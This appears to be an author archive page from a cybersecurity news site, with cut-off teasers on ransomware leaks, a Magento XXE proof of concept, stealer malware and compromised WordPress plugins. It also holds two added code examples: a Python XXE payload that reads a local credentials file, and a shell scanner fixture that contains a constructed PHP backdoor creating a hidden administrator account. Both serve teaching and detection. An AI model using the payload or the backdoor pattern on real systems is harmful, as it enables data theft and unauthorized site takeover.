Red Hot Cyber
Cybersecurity is about sharing. Recognize the risk, combat it, share your experiences, and encourage others to do better than you.

Author: Pietro Melillo

Cambridge University Press & Assessment Ends Up in the DLS of INC Ransomware

In a recent cyberattack, the cybercriminal group known as “INC Ransomware” claimed to have breached the systems of Cambridge University Press & Assessment, employing a double extortion strategy. This tactic, increasingly common among ransomware groups, involves stealing and encrypting the victim’s data, then threatening to publish the stolen data if a ransom is not paid.

The Attack on Cambridge University Press & Assessment

On June 24, 2024, the INC Ransomware group published information about the attack on its data leak site (DLS), including stolen documents as proof of the intrusion. Cambridge University Press & Assessment, one of the

Identified a POC for the CVE-2024-34102 Vulnerability in Magento / Adobe Commerce

A Proof of Concept (PoC) for CVE-2024-34102, a vulnerability affecting the Magento and Adobe Commerce e-commerce platforms, has recently surfaced online. The flaw, discovered by researchers at Assetnote, is a significant threat because it allows unauthenticated XML External Entity (XXE) injection.

Vulnerability Description

CVE-2024-34102 is an XML entity injection (XXE) vulnerability that can be exploited before authentication, which makes it particularly dangerous. Magento and Adobe Commerce are widely used to run online stores, and a flaw of this kind can expose large amounts of sensitive data and compromise the affected servers.

Technical Details
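To make concrete what “unauthenticated XML entity injection” means in practice, here is an added example (it is not code from the article, from Assetnote, or from Magento/Adobe Commerce, and it does not reproduce the CVE-2024-34102 request path). It uses Python’s standard-library SAX parser to show the generic XXE mechanism: the same attacker-supplied document is parsed once with external entity resolution enabled (the vulnerable configuration) and once with it disabled (the hardened configuration). The “secret” file, its contents and the `&xxe;` payload are constructed for the demonstration.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax import handler
from xml.sax.handler import ContentHandler


def write_secret_file(content="db_password=hunter2"):
    # Constructed stand-in for a sensitive server-side file (think of a config
    # file holding database credentials). Returns its absolute path.
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write(content)
    return path


def build_xxe_payload(path):
    # Classic XXE document: an external general entity whose SYSTEM identifier
    # points at a local file. Wherever the parser expands &xxe;, the file's
    # contents are pulled into the document and handed to the application.
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE data [<!ENTITY xxe SYSTEM "file://{path}">]>\n'
        "<data>&xxe;</data>"
    )


class _TextCollector(ContentHandler):
    # Collects the character data of the document, i.e. what an application
    # would receive as the value of <data>.
    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_data(xml_text, allow_external_entities):
    # allow_external_entities=True mirrors a parser configured (or left) to
    # resolve external entities: the vulnerable setup. False is the hardened
    # setting, which is also Python's default since 3.7.1; the feature is set
    # explicitly here so both behaviours can be shown side by side.
    parser = xml.sax.make_parser()
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.setFeature(handler.feature_external_ges, allow_external_entities)
    parser.parse(io.StringIO(xml_text))
    return "".join(collector.chunks)


def demo():
    # Returns (leaked, hardened): what each parser configuration yields for the
    # same attacker-controlled document. No authentication is involved at any
    # point; the only input is the XML itself.
    secret_path = write_secret_file()
    try:
        payload = build_xxe_payload(secret_path)
        leaked = parse_data(payload, allow_external_entities=True)
        hardened = parse_data(payload, allow_external_entities=False)
    finally:
        os.unlink(secret_path)
    return leaked, hardened


if __name__ == "__main__":
    leaked, hardened = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(hardened))
```

The fix is the same regardless of language or framework: parse untrusted XML with external entity (and DTD) resolution disabled, and treat any endpoint reachable before login that accepts XML as an attack surface to be reviewed.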

Cyberpunk 2077: Source Code Stolen?

A malicious actor has claimed to have obtained access to the complete source code of Cyberpunk 2077, the famous role-playing game developed by CD Projekt Red. If confirmed, this claim could have serious consequences for the company and the entire gaming community.

Threat Details

According to a post on a hacking forum, a user identified as “alphahat” has claimed to possess the entire source code of Cyberpunk 2077, including development tools and the Red Engine 6 game engine. The post also includes links that purportedly lead to the stolen material and a Telegram contact for further details.

Conclusion

The claim of unauthorized

Natohub claims attack on NATO’s COI. Potential data loss of 362 members

A malicious actor has released sensitive data presumably belonging to the COI Cooperation Portal, a sharing and collaboration environment for non-classified NATO documents. The portal supports NATO organizations, nations, and partners, along with public administrations and industries across PfP (Partnership for Peace) countries. The leak appears to include a list of 362 members, with information such as full name, email and organization, plus some non-classified documents. As usual, everything was posted on BreachForums by a user with the alias natohub.

Breach Details

Natohub posted a link that allows the sample files to be downloaded without a password. The sample data includes members

Xehook Stealer: The Rise and Sale of a Formidable Stealer Malware

Introduction

Xehook Stealer is a sophisticated information stealer targeting Windows operating systems, first discovered in January 2024. Within a year, Xehook has rapidly gained notoriety for its advanced data collection capabilities and its support for over 110 cryptocurrencies and 2FA extensions. Now the project’s future may be about to change: two sale announcements have been found, one on the well-known forum xss.is and the other on the malware’s own Telegram channel.

Technical Features

Xehook Stealer is written in .NET and stands out for its dynamic data collection from Chromium- and Gecko-based browsers. Key features include:

Distribution Methods

DataLeak Microsoft: 4GB of Microsoft PlayReady Code Made Public!

On June 11, a Microsoft engineer inadvertently made 4GB of internal code related to Microsoft PlayReady public. The leak occurred on the Microsoft Developer Community, a forum dedicated to developers.

Details of the Information Leak

The leaked material included:

These components are crucial for content protection and digital rights management (DRM) within Microsoft platforms.

The Construction of the PlayReady Library

Researchers from the AG Security Research Lab successfully compiled the Windows PlayReady DLL using the leaked code. Interestingly, a user from the Microsoft Developer Community provided step-by-step instructions on how to start the compilation, further facilitating the researchers’ work.

WordPress: Five Plugins Found with Malicious Code

On June 24, 2024, Wordfence revealed a supply chain attack on WordPress plugins in which five plugins were compromised with malicious code. The affected plugins are:

The malicious code aimed to create a new admin user and inject SEO spam into site footers. The compromised versions are no longer listed in the WordPress repository.

Attack Details

The attack was detected by Wordfence while analyzing the Social Warfare plugin, following a forum post by the WordPress Plugin Review team. Further investigation revealed that four more plugins were compromised in the same way. The malware attempted to create an unauthorized admin account and send the credentials to
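A site owner reading this will want a quick way to check their own plugin directory for the behaviour described (a plugin that silently creates an administrator account). The following POSIX shell helper is an added example, not Wordfence’s or WordPress’s own tooling, and it knows nothing about the specific compromised plugins: it simply flags plugin PHP files that both call a user-creation function and reference the administrator role. The sample plugin directory it builds, including the “backdoor”, is constructed for the demonstration. It is a triage heuristic only: legitimate user-management plugins will also match, and every hit needs a human look.

```sh
#!/bin/sh
# Added triage helper (not Wordfence's or WordPress's own code).
# Flags plugin PHP files that both create a user and mention the
# administrator role: the two things a "create a hidden admin" backdoor
# needs. Heuristic only; review every hit by hand.

scan_plugins() {
    plugins_dir="$1"
    find "$plugins_dir" -type f -name '*.php' 2>/dev/null | while IFS= read -r f; do
        if grep -qE 'wp_(insert|create)_user\(' "$f" \
           && grep -qE "['\"]administrator['\"]" "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Builds a constructed sample plugins directory with one benign and one
# backdoored plugin so the scan can be exercised offline. Prints its path.
make_sample_plugins() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/benign-plugin" "$tmp/compromised-plugin"
    cat > "$tmp/benign-plugin/benign.php" <<'EOF'
<?php
// Harmless: registers a shortcode and nothing else.
add_shortcode('hello', function () { return 'hello'; });
EOF
    cat > "$tmp/compromised-plugin/compromised.php" <<'EOF'
<?php
// Constructed backdoor pattern: silently creates a privileged account.
add_action('init', function () {
    if (!username_exists('svc-backup')) {
        wp_insert_user(array(
            'user_login' => 'svc-backup',
            'user_pass'  => 'ChangeMe!',
            'role'       => 'administrator',
        ));
    }
});
EOF
    printf '%s\n' "$tmp"
}

# Usage on a real site: scan_plugins /var/www/html/wp-content/plugins
if [ -n "${1:-}" ]; then
    scan_plugins "$1"
fi
```

Pair the file scan with a check of the live user table (for example `wp user list --role=administrator` via WP-CLI) so that an account already planted by a since-removed plugin is not missed.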

Julian Assange Free! Freedom Reclaimed After Five Years of Detention

London, June 25, 2024 – Julian Assange, the founder of WikiLeaks, was released yesterday from the maximum-security Belmarsh prison after spending 1901 days in detention. The news was announced by WikiLeaks on the social media platform X, confirming that Assange has accepted a deal with the U.S. justice system to plead guilty to a minor offense related to the publication of top-secret documents, thus avoiding extradition and allowing him to return to Australia. Assange’s release was made possible by a decision from the High Court in London, which granted him bail. Yesterday afternoon, Assange was released at Stansted Airport, from where he

BlackByte: The Return of the Gang after a few months of inactivity

In recent years, the cybersecurity landscape has been marked by ongoing ransomware attacks, with criminal groups constantly evolving to evade defenses. One such group, known as BlackByte, recently returned to action after months of inactivity, reviving its double extortion strategy and launching a new Data Leak Site (DLS).

Origins and Operational Methods of BlackByte

(Image: BlackByte DLS)

BlackByte emerged as a significant threat in July 2021, quickly attracting the attention of authorities such as the FBI and the US Secret Service. The group is known to exploit vulnerabilities in exposed systems to gain unauthorized access and deploy its ransomware. One of the most common techniques used by BlackByte

Presumed Cyber Attack on Zerto: Not for Financial or Espionage Purposes but for Political Reasons

Recently, the threat actor Handala posted on a well-known dark web forum claiming a cyber attack against Zerto, a subsidiary of Hewlett Packard Enterprise (HPE). Zerto is known for its disaster recovery, ransomware resilience, and workload mobility solutions, designed for virtualized infrastructures and cloud environments.

The claim as posted:

“Handala (threat actor) attacked Zerto (one of the largest Zionist cybersecurity companies in the world).”

Zerto, a Hewlett Packard Enterprise company, enables customers to manage always-on business by simplifying the protection, recovery, and mobility of on-premises and cloud applications. Zerto’s cloud data management and protection platform eliminates the risks and complexity of modernization and cloud